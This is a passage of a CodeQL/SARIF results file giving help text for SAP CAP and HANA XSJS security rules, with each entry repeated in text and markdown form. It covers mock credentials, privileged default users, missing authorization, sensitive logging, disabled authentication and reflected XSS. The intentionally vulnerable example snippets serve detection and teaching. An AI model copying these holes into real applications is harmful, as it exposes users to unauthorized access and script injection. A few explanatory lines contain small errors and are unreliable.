\"xsuaa\"\n```\n\n## Example\n\nThe following CAP application states that it uses `\"basic\"` authentication strategy along with mocked credentials. Using the pair of username and password, an attacker can gain access to certain assets by signing in to the application.\n\n``` json\n{\n  \"cds\": {\n    \"requires\": {\n      \"auth\": {\n        \"kind\": \"basic\",\n        \"users\": {\n          \"JohnDoe\": {\n            \"password\": \"JohnDoesPassword\",\n            \"roles\": [\"JohnDoesRole\"],\n            \"attr\": {}\n          },\n          \"JaneDoe\": {\n            \"password\": \"JaneDoesPassword\",\n            \"roles\": [\"JaneDoesRole\"],\n            \"attr\": {}\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n## References\n\n- Common Weakness Enumeration: [CWE-288](https://cwe.mitre.org/data/definitions/288.html).\n- Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n","markdown":"# Non-Production Authentication Strategy Used without Profiles\n\nUsing a non-production authentication strategy without setting up a distinct profile for development may pose allow unintended authentication and/or authorization if the application is deployed into production.\n\n## Recommendation\n\n### Isolate the use of development-level strategies to a development profile\n\nUse separate profiles for development and deployment and select one as needed. In this way, properties including authentication strategies can be substituted by changing a single command line option: `--profile`. For example, having the following section in the application's `package.json` states that the `\"dummy\"` authentication strategy must be used while `\"xsuaa\"`, a production-grade strategy, should be used when deployed:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    },\n    \"[deploy]\": {\n      \"auth\": \"xsuaa\"\n    }\n  }\n}\n```\n\nThe application can be now run in different modes depending on the `--profile` command line option:\n\n``` shell\n$ cds serve --profile dev    # Runs the application in development profile with strategy \"dummy\"\n$ cds serve --profile deploy # Runs the application in development profile with strategy \"xsuaa\"\n```\n\n## Example\n\nThe following CAP application states that it uses `\"basic\"` authentication strategy along with mocked credentials. Using the pair of username and password, an attacker can gain access to certain assets by signing in to the application.\n\n``` json\n{\n  \"cds\": {\n    \"requires\": {\n      \"auth\": {\n        \"kind\": \"basic\",\n        \"users\": {\n          \"JohnDoe\": {\n            \"password\": \"JohnDoesPassword\",\n            \"roles\": [\"JohnDoesRole\"],\n            \"attr\": {}\n          },\n          \"JaneDoe\": {\n            \"password\": \"JaneDoesPassword\",\n            \"roles\": [\"JaneDoesRole\"],\n            \"attr\": {}\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n## References\n\n- Common Weakness Enumeration: [CWE-288](https://cwe.mitre.org/data/definitions/288.html).\n- Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n"},"properties":{"tags":["security"],"description":"Using non-production authentication strategies can lead to unwanted authentication behavior in production.","id":"js/cap-non-prod-auth-strategy","kind":"problem","name":"Non-production authentication strategy used","precision":"high","problem.severity":"warning","security-severity":"6"}},{"id":"js/cap-default-user-is-privileged","name":"js/cap-default-user-is-privileged","shortDescription":{"text":"Default user is privileged"},"fullDescription":{"text":"Overriding the default user to the privileged user allows for authentication bypass."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Default User is overwritten as privileged\n\nUsers that cannot be verified as authenticated are represented as `cds.User.default` internally. Setting this property to `cds.User.Privileged` may result in providing protected assets to unauthorized users.\n\n## Recommendation\n\n### Set up a development profile that uses non-production authentication\n\nOverwriting `cds.User.default` as `cds.User.Privileged` for testing purposes is not recommended as such code may easily slip through production.\n\nInstead, set up a development profile and opt in to use a non-production strategy such as `\"basic\"`, `\"dummy\"`, or `\"mocked\"` during its use. This can be done in the file `package.json` in the root folder of the CAP application:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    }\n  }\n}\n```\n\nSetting `\"dummy\"` as the development authentication strategy has the effect of disabling `@requires` and `@restrict` annotations of CDS definitions that provides authorization. The application during development then can be run and tested with the `--profile dev` option.\n\n```shell\ncds serve --profile dev\n```\n\n## Example\n\nSetting `cds.User.default` to `cds.User.Privileged` may happen anywhere in the application. In the following example, the `server.js` file provides the top-level definition of a CAP application and overwrites the `default` user property with the `Privileged` class.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst app = require(\"express\")();\n\n/*\n * Antipattern: `cds.User.default` is overwritten to `cds.User.Privileged`\n */\ncds.User.default = cdsUser.Privileged;\n\ncds.serve(\"all\").in(app);\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.default](https://cap.cloud.sap/docs/node.js/authentication#default-user).\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n","markdown":"# Default User is overwritten as privileged\n\nUsers that cannot be verified as authenticated are represented as `cds.User.default` internally. Setting this property to `cds.User.Privileged` may result in providing protected assets to unauthorized users.\n\n## Recommendation\n\n### Set up a development profile that uses non-production authentication\n\nOverwriting `cds.User.default` as `cds.User.Privileged` for testing purposes is not recommended as such code may easily slip through production.\n\nInstead, set up a development profile and opt in to use a non-production strategy such as `\"basic\"`, `\"dummy\"`, or `\"mocked\"` during its use. This can be done in the file `package.json` in the root folder of the CAP application:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    }\n  }\n}\n```\n\nSetting `\"dummy\"` as the development authentication strategy has the effect of disabling `@requires` and `@restrict` annotations of CDS definitions that provides authorization. The application during development then can be run and tested with the `--profile dev` option.\n\n```shell\ncds serve --profile dev\n```\n\n## Example\n\nSetting `cds.User.default` to `cds.User.Privileged` may happen anywhere in the application. In the following example, the `server.js` file provides the top-level definition of a CAP application and overwrites the `default` user property with the `Privileged` class.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst app = require(\"express\")();\n\n/*\n * Antipattern: `cds.User.default` is overwritten to `cds.User.Privileged`\n */\ncds.User.default = cdsUser.Privileged;\n\ncds.serve(\"all\").in(app);\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.default](https://cap.cloud.sap/docs/node.js/authentication#default-user).\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n"},"properties":{"tags":["security"],"description":"Overriding the default user to the privileged user allows for authentication bypass.","id":"js/cap-default-user-is-privileged","kind":"problem","name":"Default user is privileged","precision":"high","problem.severity":"error","security-severity":"6"}},{"id":"js/cap-unnecessarily-granted-privileged-access-rights","name":"js/cap-unnecessarily-granted-privileged-access-rights","shortDescription":{"text":"Access rights to an entity is unnecessarily elevated to privileged"},"fullDescription":{"text":"An entity requiring authorization is being accessed with privileged rights."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Access rights to an entity is unnecessarily elevated to privileged\n\nThe privileged user `cds.User.Privileged` is used to access an entity that requires authorization. If the application does not verify the actual user rights, it may expose protected entities to unauthorized users.\n\nThis is especially important when the accessed entity belongs to a remote service. By default, when using a production-grade authentication strategy all CAP endpoints are authenticated. However, if the entity is outside the application, there is no guarantee that the user is authenticated in the remote service.\n\n## Recommendations\n\n### Avoid using `cds.User.Privileged` when accessing an access-controlled entity\n\nAny entity that requires authorization should be accessed within the context of the authenticated user. When using a transaction, prefer using `cds.User` as the `user` attribute of the option argument to the call of `cds.ApplicationService.tx()` in order to check the required access rights of the entity against that of the user.\n\n## Examples\n\nThe following service, named Service1 and implemented in the file service1.js, is accessing an entity that belongs to another service named Service2 and defined in the file service2.cds. The entity, Service2Entity, demands that the user have level greater than 2.\n\n### `service1.js`\n\n``` javascript\nthis.on(\"action1\", async (req) => {\n  const Service2 = await cds.connect.to(\"Service2\");\n  const { Service2Entity } = Service2.entities;\n  return this.tx({ user: new cds.User.Privileged(\"\") }, (tx) =>\n    tx.run(\n      SELECT.from(Service2Entity) // Declared in service2.cds\n        .where`Attribute4=${req.data.messageToPass}`,\n    ),\n  );\n});\n```\n\n### `service2.cds`\n\n``` cds\nservice Service2 @(path: 'service-2') {\n  /* Read access only to users with access level greater than 2. */\n  @(restrict: [ { grant: 'READ', to: '$user.level > 2' } ])\n  entity Service2Entity {\n    Attribute1 : String(100);\n    Attribute2 : String(100)\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [cds.tx()](https://cap.cloud.sap/docs/node.js/cds-tx#srv-tx-ctx).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n- Common Weakness Enumeration: [CWE-266](https://cwe.mitre.org/data/definitions/266.html).\n","markdown":"# Access rights to an entity is unnecessarily elevated to privileged\n\nThe privileged user `cds.User.Privileged` is used to access an entity that requires authorization. If the application does not verify the actual user rights, it may expose protected entities to unauthorized users.\n\nThis is especially important when the accessed entity belongs to a remote service. By default, when using a production-grade authentication strategy all CAP endpoints are authenticated. However, if the entity is outside the application, there is no guarantee that the user is authenticated in the remote service.\n\n## Recommendations\n\n### Avoid using `cds.User.Privileged` when accessing an access-controlled entity\n\nAny entity that requires authorization should be accessed within the context of the authenticated user. When using a transaction, prefer using `cds.User` as the `user` attribute of the option argument to the call of `cds.ApplicationService.tx()` in order to check the required access rights of the entity against that of the user.\n\n## Examples\n\nThe following service, named Service1 and implemented in the file service1.js, is accessing an entity that belongs to another service named Service2 and defined in the file service2.cds. The entity, Service2Entity, demands that the user have level greater than 2.\n\n### `service1.js`\n\n``` javascript\nthis.on(\"action1\", async (req) => {\n  const Service2 = await cds.connect.to(\"Service2\");\n  const { Service2Entity } = Service2.entities;\n  return this.tx({ user: new cds.User.Privileged(\"\") }, (tx) =>\n    tx.run(\n      SELECT.from(Service2Entity) // Declared in service2.cds\n        .where`Attribute4=${req.data.messageToPass}`,\n    ),\n  );\n});\n```\n\n### `service2.cds`\n\n``` cds\nservice Service2 @(path: 'service-2') {\n  /* Read access only to users with access level greater than 2. */\n  @(restrict: [ { grant: 'READ', to: '$user.level > 2' } ])\n  entity Service2Entity {\n    Attribute1 : String(100);\n    Attribute2 : String(100)\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [cds.tx()](https://cap.cloud.sap/docs/node.js/cds-tx#srv-tx-ctx).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n- Common Weakness Enumeration: [CWE-266](https://cwe.mitre.org/data/definitions/266.html).\n"},"properties":{"tags":["security"],"description":"An entity requiring authorization is being accessed with privileged rights.","id":"js/cap-unnecessarily-granted-privileged-access-rights","kind":"problem","name":"Access rights to an entity is unnecessarily elevated to privileged","precision":"high","problem.severity":"error","security-severity":"6"}},{"id":"js/cap-entity-exposed-without-authentication","name":"js/cap-entity-exposed-without-authentication","shortDescription":{"text":"Entity exposed without authentication"},"fullDescription":{"text":"Entities exposed to external protocols should require an CDS-based or JS-based access control."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP Definitions Exposed without Access Controls\n\nAlthough using a production-level authentication strategy such as `jwt` ensures that all entities and services require the user to be authenticated, this does not guarantee any further authorization. Furthermore, the lack of required authentication or authorization may imply a gap in the design of the system.\n\n## Recommendation\n\n### Use CDS-based authorization\n\nCDL provides two annotations to declare access controls `@requires` and `@restrict` with the latter providing more granularity than the former. For example, to check if a request is being made by an authenticated user to the CDL entity or service, annotate it with `@requires: 'authenticated-user'`. On the other hand, if it needs to be read only via a certain group of users where the user has level greater than 2, use `@restrict: { grant: 'READ', to: 'SomeUser', where: { $user.level > 2 } }` (note the leading `$`).\n\n#### Check the original CDS entity it is derived from\n\nCDS entities may be derived from other entities by means of selection and projection. Derived definitions inherit access control conditions and optionally override them. In order to accurately determine what authorization an entity requires, the access control of the parent entity should be transitively inspected.\n\n### Enforce authorization with JavaScript\n\nAccess control may be enforced when a request handler for the relevant entity or service is registered. Both `cds.Service.before` and `cds.Service.on` may be used for enforcement. For example, to restrict writing to and updating an entity to a user satisfying certain requirements, either one of the below handler registrations may be used:\n\n``` javascript\n/**\n * Before serving a request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.before([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  (req.user.is(\"SomeRole\") && req.user.attr.level > 3) || req.reject(403);\n});\n\n/**\n * On request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.on([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  if (req.user.is(\"SomeRole\") && req.user.attr.level > 3) {\n    /* Do something */\n  } else req.reject(403);\n});\n```\n\n## Examples\n\nThe following CDS definition and its JavaScript implementation imposes no authorization on `SomeEntity`. Note that the `OriginalEntity` from which `DerivedEntity` derives from does not control the access either.\n\n### db/schema.cds\n\n``` cap-cds\nnamespace sample_namespace.sample_entities;\n\nentity OriginalEntity {\n  Attribute1 : String(100);\n  Attribute2 : String(100)\n}\n```\n\n### srv/service1.cds\n\n``` cap-cds\nusing { sample_namespace.sample_entities as db_schema } from '../db/schema';\n\nservice SomeService {\n  entity DerivedEntity as projection on db_schema.OriginalEntity excluding { Attribute2 }\n}\n```\n\n### srv/service1.js\n\n``` javascript\n\nconst cds = require(\"@sap/cds\");\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"READ\", \"SomeService\", (req) => { })\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [Authorization Enforcement](https://cap.cloud.sap/docs/node.js/authentication#enforcement).\n- SAP CAPire Documentation: [@restrict](https://cap.cloud.sap/docs/guides/security/authorization#restrict-annotation).\n- SAP CAPire Documentation:\n[@requires](https://cap.cloud.sap/docs/guides/security/authorization#requires).\n- SAP CAPire Documentation: [Protecting Certain Entries](https://cap.cloud.sap/docs/cds/common#protecting-certain-entries).\n- SAP CAPire Documentation: [Inheritance of Restrictions](https://cap.cloud.sap/docs/guides/security/authorization#inheritance-of-restrictions).\n- SAP CAPire Documentation: [Authentication Enforced in Production](https://cap.cloud.sap/docs/node.js/authentication#authentication-enforced-in-production).\n- Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n","markdown":"# CAP Definitions Exposed without Access Controls\n\nAlthough using a production-level authentication strategy such as `jwt` ensures that all entities and services require the user to be authenticated, this does not guarantee any further authorization. Furthermore, the lack of required authentication or authorization may imply a gap in the design of the system.\n\n## Recommendation\n\n### Use CDS-based authorization\n\nCDL provides two annotations to declare access controls `@requires` and `@restrict` with the latter providing more granularity than the former. For example, to check if a request is being made by an authenticated user to the CDL entity or service, annotate it with `@requires: 'authenticated-user'`. On the other hand, if it needs to be read only via a certain group of users where the user has level greater than 2, use `@restrict: { grant: 'READ', to: 'SomeUser', where: { $user.level > 2 } }` (note the leading `$`).\n\n#### Check the original CDS entity it is derived from\n\nCDS entities may be derived from other entities by means of selection and projection. Derived definitions inherit access control conditions and optionally override them. In order to accurately determine what authorization an entity requires, the access control of the parent entity should be transitively inspected.\n\n### Enforce authorization with JavaScript\n\nAccess control may be enforced when a request handler for the relevant entity or service is registered. Both `cds.Service.before` and `cds.Service.on` may be used for enforcement. For example, to restrict writing to and updating an entity to a user satisfying certain requirements, either one of the below handler registrations may be used:\n\n``` javascript\n/**\n * Before serving a request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.before([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  (req.user.is(\"SomeRole\") && req.user.attr.level > 3) || req.reject(403);\n});\n\n/**\n * On request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.on([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  if (req.user.is(\"SomeRole\") && req.user.attr.level > 3) {\n    /* Do something */\n  } else req.reject(403);\n});\n```\n\n## Examples\n\nThe following CDS definition and its JavaScript implementation imposes no authorization on `SomeEntity`. Note that the `OriginalEntity` from which `DerivedEntity` derives from does not control the access either.\n\n### db/schema.cds\n\n``` cap-cds\nnamespace sample_namespace.sample_entities;\n\nentity OriginalEntity {\n  Attribute1 : String(100);\n  Attribute2 : String(100)\n}\n```\n\n### srv/service1.cds\n\n``` cap-cds\nusing { sample_namespace.sample_entities as db_schema } from '../db/schema';\n\nservice SomeService {\n  entity DerivedEntity as projection on db_schema.OriginalEntity excluding { Attribute2 }\n}\n```\n\n### srv/service1.js\n\n``` javascript\n\nconst cds = require(\"@sap/cds\");\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"READ\", \"SomeService\", (req) => { })\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [Authorization Enforcement](https://cap.cloud.sap/docs/node.js/authentication#enforcement).\n- SAP CAPire Documentation: [@restrict](https://cap.cloud.sap/docs/guides/security/authorization#restrict-annotation).\n- SAP CAPire Documentation:\n[@requires](https://cap.cloud.sap/docs/guides/security/authorization#requires).\n- SAP CAPire Documentation: [Protecting Certain Entries](https://cap.cloud.sap/docs/cds/common#protecting-certain-entries).\n- SAP CAPire Documentation: [Inheritance of Restrictions](https://cap.cloud.sap/docs/guides/security/authorization#inheritance-of-restrictions).\n- SAP CAPire Documentation: [Authentication Enforced in Production](https://cap.cloud.sap/docs/node.js/authentication#authentication-enforced-in-production).\n- Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n"},"properties":{"tags":["security"],"description":"Entities exposed to external protocols should require an\n              CDS-based or JS-based access control.","id":"js/cap-entity-exposed-without-authentication","kind":"problem","name":"Entity exposed without authentication","precision":"high","problem.severity":"warning","security-severity":"6"}},{"id":"js/cap-sensitive-log","name":"js/cap-sensitive-log","shortDescription":{"text":"Insertion of sensitive information into log files"},"fullDescription":{"text":"Writing sensitive information to log files can allow that information to be leaked to an attacker more easily."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP Insertion of Sensitive Information into Log File\n\nIf sensitive information is written to a log entry using the CAP Node.js logging API, a malicious user may be able to gain access to user data.\n\nData annotated as `@PersonalData` should not be logged.\n\n## Recommendation\n\nCAP applications should not log sensitive information. Check CDS declarations for annotations before logging certain data types or fields.\n\n## Examples\n\nThis CAP service directly logs the sensitive information.\n\n```cds\nnamespace advanced_security.log_exposure.sample_entities;\n\nentity Sample {\n    name         : String(111);\n}\n\n// annotations for Data Privacy\nannotate Sample with\n@PersonalData : { DataSubjectRole : 'Sample', EntitySemantics : 'DataSubject' }\n{\n  name  @PersonalData.IsPotentiallySensitive;\n}\n```\n\n``` javascript\nimport cds from '@sap/cds'\nconst LOG = cds.log(\"logger\");\n\nconst { Sample } = cds.entities('advanced_security.log_exposure.sample_entities')\n\nclass SampleVulnService extends cds.ApplicationService {\n    init() {\n        LOG.info(\"Received: \", Sample.name); // CAP log exposure alert\n    }\n}\n```\n\n## References\n\n- OWASP 2021: [Security Logging and Monitoring Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n- OWASP: [Logging Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- OWASP: [User Privacy Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html).\n- SAP CAPire Documentation: [PersonalData Annotations](https://cap.cloud.sap/docs/guides/data-privacy/annotations).","markdown":"# CAP Insertion of Sensitive Information into Log File\n\nIf sensitive information is written to a log entry using the CAP Node.js logging API, a malicious user may be able to gain access to user data.\n\nData annotated as `@PersonalData` should not be logged.\n\n## Recommendation\n\nCAP applications should not log sensitive information. Check CDS declarations for annotations before logging certain data types or fields.\n\n## Examples\n\nThis CAP service directly logs the sensitive information.\n\n```cds\nnamespace advanced_security.log_exposure.sample_entities;\n\nentity Sample {\n    name         : String(111);\n}\n\n// annotations for Data Privacy\nannotate Sample with\n@PersonalData : { DataSubjectRole : 'Sample', EntitySemantics : 'DataSubject' }\n{\n  name  @PersonalData.IsPotentiallySensitive;\n}\n```\n\n``` javascript\nimport cds from '@sap/cds'\nconst LOG = cds.log(\"logger\");\n\nconst { Sample } = cds.entities('advanced_security.log_exposure.sample_entities')\n\nclass SampleVulnService extends cds.ApplicationService {\n    init() {\n        LOG.info(\"Received: \", Sample.name); // CAP log exposure alert\n    }\n}\n```\n\n## References\n\n- OWASP 2021: [Security Logging and Monitoring Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n- OWASP: [Logging Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- OWASP: [User Privacy Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html).\n- SAP CAPire Documentation: [PersonalData Annotations](https://cap.cloud.sap/docs/guides/data-privacy/annotations)."},"properties":{"tags":["security","external/cwe/cwe-532"],"description":"Writing sensitive information to log files can allow that\n              information to be leaked to an attacker more easily.","id":"js/cap-sensitive-log","kind":"path-problem","name":"Insertion of sensitive information into log files","precision":"medium","problem.severity":"warning","security-severity":"7.5"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-xsjs-queries","semanticVersion":"2.3.0+4627b48907d3149838f214e246d09f1605391fcb","rules":[{"id":"js/xsjs-broken-authentication","name":"js/xsjs-broken-authentication","shortDescription":{"text":"Broken XSJS authentication"},"fullDescription":{"text":"Disabling XSJS authentication makes the application vulnerable to unauthorized access."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Authentication not enforced in HANA XS application\n\nThis HANA XS application does not enforce authentication on the requests it handles.\n\n## Overview\n\nSAP HANA XS applications are called via HTTP requests to process a connected HANA database, and this makes it critical to authenticate the sender of the request. Failing to do so allows attackers to impersonate users and gain access to underlying systems and data.\n\n## Recommendation\n\nUse the built-in SAP HANA XS authentication mechanism and session management (cookies).\n- If `XS Advanced` is used, authentication **is enabled by default**, and the `authenticationMethod` property indicates which authentication will be applied. However, avoid setting the property to something else than `none`, as doing so turns off all authentication on all routes.\n- If `XS Classic` is used, authentication is **not enabled by default**, so the `authentication` property in the application's `.xsaccess` file should be set to enable authentication. Set the value of the property according to the method you want to implement (`LogonTicket`, `Form`, or `Basic`).\n\n## Example\n\nThe fragment from an `xs-app.json` file shows the application in question having its authentication explicitly disabled.\n\n```json\n{\n  \"welcomeFile\": \"index.html\",\n  \"authenticationMethod\": \"none\",\n  ...\n}\n```\n\n## References\n\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/2040c1b7e478448cb9904c55ac06cac8.html).\n- SAP: [XS Advanced Application Router Configuration](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Application-Access File Keyword Options: Authentication](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03&locale=en-US#authentication), relevant to XS Classic applications.\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n","markdown":"# Authentication not enforced in HANA XS application\n\nThis HANA XS application does not enforce authentication on the requests it handles.\n\n## Overview\n\nSAP HANA XS applications are called via HTTP requests to process a connected HANA database, and this makes it critical to authenticate the sender of the request. Failing to do so allows attackers to impersonate users and gain access to underlying systems and data.\n\n## Recommendation\n\nUse the built-in SAP HANA XS authentication mechanism and session management (cookies).\n- If `XS Advanced` is used, authentication **is enabled by default**, and the `authenticationMethod` property indicates which authentication will be applied. However, avoid setting the property to something else than `none`, as doing so turns off all authentication on all routes.\n- If `XS Classic` is used, authentication is **not enabled by default**, so the `authentication` property in the application's `.xsaccess` file should be set to enable authentication. Set the value of the property according to the method you want to implement (`LogonTicket`, `Form`, or `Basic`).\n\n## Example\n\nThe fragment from an `xs-app.json` file shows the application in question having its authentication explicitly disabled.\n\n```json\n{\n  \"welcomeFile\": \"index.html\",\n  \"authenticationMethod\": \"none\",\n  ...\n}\n```\n\n## References\n\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/2040c1b7e478448cb9904c55ac06cac8.html).\n- SAP: [XS Advanced Application Router Configuration](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Application-Access File Keyword Options: Authentication](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03&locale=en-US#authentication), relevant to XS Classic applications.\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n"},"properties":{"tags":["security","external/cwe/cwe-306"],"description":"Disabling XSJS authentication makes the application vulnerable to unauthorized access.","id":"js/xsjs-broken-authentication","kind":"problem","name":"Broken XSJS authentication","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/xsjs-reflected-xss","name":"js/xsjs-reflected-xss","shortDescription":{"text":"XSJS Reflected XSS"},"fullDescription":{"text":"Including uncontrolled value into a response body and setting it to a scriptable MIME type allows for cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Reflected Cross-site Scripting\n\nIncluding a text, received from a client browser typically through an XSJS request parameter, to be rendered as HTML in a request body may execute arbitrary JavaScript code on the client.\n\n## Recommendation\n\nThe XSJS application should always validate or sanitize the submitted string from a client before including it into a response body to be rendered in a client browser.\n\n### Validate the input string\n\nValidate the submitted input by looking for a sensitive HTML tag such as `<script ...>...</script>`. The pattern may be encoded to a regular expression and matched against the input; If there is a match, then the XSJS application may decide to abort the process and instead return an HTTP code stating that the application rejected the request (e.g. `$.net.FORBIDDEN`). XSJS does not provide a function to reliably perform the above, therefore using a third-party library is recommended.\n\n### Sanitize the input string\n\n#### Server-side sanitization\n\nThe XSJS application may instead allow any user input, but sanitize it before it integrates it into the response body. This is achieved by escaping special characters that are treated as part of the HTML syntax, such as `\"`, `&`, `'`, `<`, and `>`. Since XSJS does not provide a function to escape these, using a third-party library is recommended.\n\n#### Client-side sanitization\n\nAlternatively, if SAP UI5 is used on the frontend, there are client-side escaping mechanisms such as `sap.base.security.encodeXML` and `sap.base.security.encodeHTML`. If `sap.ui.core.HTML` is used in the frontend view, consider setting its `sanitizeContent` property explicitly to `true`, since its default value is `false`.\n\n## Example\n\nThe following XSJS application sets the response body directly to a string received from a user without any validation or sanitization. The header's content type is set as an HTML document, which allows for any embedded JavaScript to be run in the request body. Note that even if `clientData` was not enclosed in a `div`, the vulnerability would still exist.\n\n``` javascript\nlet clientData = requestParameters.get(\"someParameter\");\n$.response.contentType = \"text/html\";\n$.response.setBody(\"<div>\" + clientData + \"</div>\");\n$.response.status = $.net.http.OK;\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Cross-Site Scripting\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/0e1c9fff826a4583be715386578fffc7.html).\n* OWASP: [Types of Cross-site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* OWASP: [Cross Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n\n","markdown":"# Reflected Cross-site Scripting\n\nIncluding a text, received from a client browser typically through an XSJS request parameter, to be rendered as HTML in a request body may execute arbitrary JavaScript code on the client.\n\n## Recommendation\n\nThe XSJS application should always validate or sanitize the submitted string from a client before including it into a response body to be rendered in a client browser.\n\n### Validate the input string\n\nValidate the submitted input by looking for a sensitive HTML tag such as `<script ...>...</script>`. The pattern may be encoded to a regular expression and matched against the input; If there is a match, then the XSJS application may decide to abort the process and instead return an HTTP code stating that the application rejected the request (e.g. `$.net.FORBIDDEN`). XSJS does not provide a function to reliably perform the above, therefore using a third-party library is recommended.\n\n### Sanitize the input string\n\n#### Server-side sanitization\n\nThe XSJS application may instead allow any user input, but sanitize it before it integrates it into the response body. This is achieved by escaping special characters that are treated as part of the HTML 